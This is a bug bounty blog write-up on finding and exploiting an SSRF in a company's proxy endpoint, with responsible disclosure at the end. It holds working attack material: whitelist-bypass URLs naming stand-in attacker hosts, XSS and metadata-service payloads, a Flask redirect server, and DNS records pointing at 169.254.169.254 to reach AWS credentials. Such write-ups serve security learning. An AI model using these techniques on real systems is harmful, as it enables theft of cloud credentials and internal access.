Exploiting an SSRF: Trials and Tribulations

A Bug’z Life · Mar 3, 2020

I wanted to share this post not because it's a novel or unique attack, but to show the thought process behind attacking this particular piece of functionality: understanding how the system works in order to identify what would and would not succeed. This post covers an SSRF (Server-Side Request Forgery) bug that was a lot of fun to discover and took a lot of work to finally exploit.

The endpoint was actually sent to me to poke at by a fellow bug hunter, Ibram, after we realized we were on the same program. It was our first time collaborating, and we ended up finding quite a few things of interest. We both dug in and shared findings back and forth on how the application was behaving, which was very helpful. I also noticed this endpoint popped up several times (on about 15 subdomains) in Wayback Machine results. The functionality was every bug hunter's dream for SSRF: a proxy endpoint where the client provides a URL, and the server makes an HTTP request to it and displays the response directly to the user (as HTML). The endpoint was something like https://company.com/proxy. The first thing I tried was pointing it at my Burp Collaborator instance to see if the server would fetch it.
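The request looked something like this (the Collaborator subdomain here is made up; the url parameter name comes up again later):

GET /proxy?url=https://abc123.burpcollaborator.net/ HTTP/1.1
Host: company.com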

The Collaborator instance never received a hit: there was whitelist functionality in use here, and the server would only fetch hosts from a "trusted" list. I tried various company.com domains and noticed they all worked, so we concluded that *.company.com was allowed by the whitelist. The next step was to hunt for an open redirect or a subdomain takeover on *.company.com: an open redirect would let a trusted/allowed domain bounce the server to something attacker-controlled or internal, while a subdomain takeover would let me serve my own content from a trusted domain.

To start looking for these, I did subdomain discovery for *.company.com using Findomain, checked for live hosts with httprobe, and finally pulled back every URL known for those hosts from the Wayback Machine using waybackurls. This gave me a list of a few hundred thousand URLs to search through for open redirects and subdomain takeovers. I started with open redirects by grepping the waybackurls output for anything that might be one: grep "=http" wayback.txt. This surfaces any query parameter whose value starts with http, i.e. a URL passed as a parameter, which is great for discovering open redirects and SSRFs.
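For anyone who prefers to script it, here is a minimal Python version of the same filter (wayback.txt as above); this variant also catches URL-encoded values that the plain grep misses:

import re

# match query parameters whose value starts with http:// or https://,
# in plain or URL-encoded form
pattern = re.compile(r"[?&][^=&]*=https?(://|%3a%2f%2f)", re.IGNORECASE)

with open("wayback.txt") as f:
    for line in f:
        if pattern.search(line):
            print(line.strip())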

We ended up finding a few open redirects quite easily! Back to testing: I pointed an allowed domain's open redirect at my Burp Collaborator instance. Unfortunately, any redirect resulted in a 302 to a default error page; the server would not follow it. I tried a few different things here, but ultimately learned redirects were not going to work, as the server was simply fetching a single URL and returning the response. What I eventually realized was that any response other than a 200 made the application throw that 302. I hunted a bit more for subdomain takeovers, but could not find any.

My goal had been finding an open redirect, but that was no longer a viable option. Before diving deeper into the URL parser/whitelist logic, I went back to the list of subdomains I had discovered earlier and passed each one through as the url parameter. The idea was that the domains which didn't resolve publicly, or which timed out, were likely internally accessible, so fetching them through the proxy might expose hidden content the server had access to. I expected this to work for at least some of them, but unfortunately nothing interesting popped up. I also checked *.company.com for any DNS record pointing to localhost or 127.0.0.1, since such a domain would pass the whitelist while resolving to an internally accessible service. Unfortunately, I could not find any domain with a record like this.
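That DNS check is quick to script; a rough sketch, assuming subs.txt holds one subdomain per line:

import socket

with open("subs.txt") as f:
    for sub in (line.strip() for line in f):
        try:
            ip = socket.gethostbyname(sub)
        except socket.gaierror:
            continue  # no public record; still worth passing through the proxy
        # flag anything that resolves to loopback
        if ip.startswith("127."):
            print(f"{sub} -> {ip}")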

Now, with my options narrowing, I decided to try to bypass the URL parser logic and sneak an arbitrary URL through the whitelist. I went through just about every special/weird character, every redirect/SSRF bypass technique, and everything in the publicly available wordlists out there, but had no luck. Any IP address, or decimal-encoded version of one, gave generic errors. The parser logic seemed quite robust after this round of testing.
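To give a flavor of what failed, the attempts included the usual suspects, along these lines (attacker host names illustrative):

http://127.0.0.1/ (direct IP)
http://2130706433/ (127.0.0.1 as a decimal integer)
http://0x7f000001/ (hex-encoded IP)
https://company.com@attacker.example/ (userinfo trick)
https://attacker.example/#company.com (fragment trick)
https://company.com.attacker.example/ (trusted name as a subdomain)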

Since bypassing the whitelist didn't look feasible, I decided to check whether the list itself was overly permissive. I took a list of the top 1000 domains that I found on GitHub and passed each one through the url parameter. It turned out the whitelist wasn't as restricted as I initially thought: amazonaws.com popped up as an allowed domain. For those not familiar, amazonaws.com is the AWS domain tied to many popular services, such as S3 and EC2, on which customers get their own unique endpoint or subdomain. Finally! I could serve my own content from my own AWS resources. To test this out, I hosted an XSS HTML file on S3:
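The file was nothing fancy; a minimal sketch of the sort of thing hosted there (not the exact file):

<html>
  <body>
    <!-- executes in the proxy's origin, since the response is rendered as HTML -->
    <script>alert(document.domain)</script>
  </body>
</html>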

As expected, it worked! As a worst case, I now had an XSS to report. While XSS can be high impact in certain scenarios, this was one of those features you just know is more vulnerable, so I wanted to keep pushing. I tried a few different things to get the server to execute my HTML or JavaScript and load sensitive content in iframes or images, such as:

AWS Metadata Service: <iframe src="http://169.254.169.254/latest/meta-data/"></iframe>

Local Files: <img src="file:///etc/passwd">

Unfortunately, as earlier behavior had indicated, the server was not actually executing any content from the target URL, just fetching and returning it. So instead of static files on S3, I launched an EC2 instance where I could serve more dynamic content. I spun up a quick server and wrote a few simple Flask endpoints to serve various content, perform redirects, and a couple of other things. After trying to serve various content and files without turning up anything more interesting, I decided to revisit redirects: maybe if I paired the redirect with a particular response code, the server would follow it. I wrote a quick Flask endpoint that accepts url and code query parameters so that I could easily iterate through every HTTP status code. I also noticed the application was caching responses per URL, so each request needed a unique URL; easy enough to get past by adding a unique query string to each request, such as:

https://my-ec2.amazonaws.com/redirect?1&url=...&code=302

https://my-ec2.amazonaws.com/redirect?2&url=...&code=302
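The endpoint behind those URLs was something along these lines (a sketch, not the original code):

from flask import Flask, Response, request

app = Flask(__name__)

@app.route("/redirect")
def do_redirect():
    target = request.args.get("url", "")
    code = int(request.args.get("code", "302"))
    # build the response by hand so any status code can carry a
    # Location header, not just the standard 3xx ones
    return Response(status=code, headers={"Location": target})

if __name__ == "__main__":
    # the real endpoint was served over HTTPS; plain HTTP keeps the sketch simple
    app.run(host="0.0.0.0", port=80)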

Again, no luck here. At this point I was getting a bit desperate, so I looked for any *.amazonaws.com domain with a DNS record pointing to localhost, 127.0.0.1, or the metadata service at 169.254.169.254. As expected, nothing. After many trials and errors, I remembered that while testing the URL parser logic, the application gave different responses depending on whether a URL was disallowed versus allowed but not returning a 200. Digging back in, I found that the whitelist was not actually *.company.com; it was in fact *company.com, matching any host name that simply ends in the string company.com. I hadn't caught this earlier because those requests were failing, but only because such domains didn't exist. So there I am, walking home, buying a domain on AWS from my phone (neemacompany.com) and setting up DNS records pointing md.neemacompany.com at 169.254.169.254 and local.neemacompany.com at 127.0.0.1.
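In zone-file terms, the records were:

md.neemacompany.com.     IN  A  169.254.169.254
local.neemacompany.com.  IN  A  127.0.0.1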

Once the domain was finally registered and the DNS records had propagated, I pulled out my laptop and immediately tried to hit the record pointing at the AWS metadata service, and BAM!

Successful response from AWS Metadata service
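The request itself was along these lines (the /latest/meta-data/ path is the standard IMDSv1 entry point):

GET /proxy?url=http://md.neemacompany.com/latest/meta-data/ HTTP/1.1
Host: company.com

From there, IMDSv1 exposes temporary credentials under /latest/meta-data/iam/security-credentials/<role-name>, which is what makes this class of SSRF so impactful.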

Finally! I had found the missing piece, and as suspected, this functionality was indeed vulnerable. For those not familiar, the AWS metadata service can be used to obtain temporary AWS credentials, giving access to the company's AWS environment, depending on what permissions those credentials carry. I also tried local.neemacompany.com and confirmed I could hit localhost (and other internal services) as well. Feeling accomplished, I went ahead and wrote up and submitted the report. Now I could rest in peace for the night!

Next morning, I wake up and BAM:

Duplicate of a report from nearly a year ago! I had to laugh when I saw that, given all the work and testing that went into this. I suspect the original report didn't demonstrate high impact, since the bug hadn't been fixed in a year, but I cannot confirm that. It is disappointing to see a good bug get duped, but honestly, in this case I was mostly happy that I was able to figure it out (even though I ended up losing $12 on the domain purchase). It was one of those bugs that would have driven me crazy if I had never solved it, so it felt rewarding to go through the whole process; it was a lot of fun to figure out and exploit! It was also great to collaborate with another bug hunter, Ibram, who has been finding some really awesome bugs and interesting leads in this particular target.

I hope this post on my thought process, from understanding a particular bit of functionality to finally exploiting it, was enjoyable and helpful!
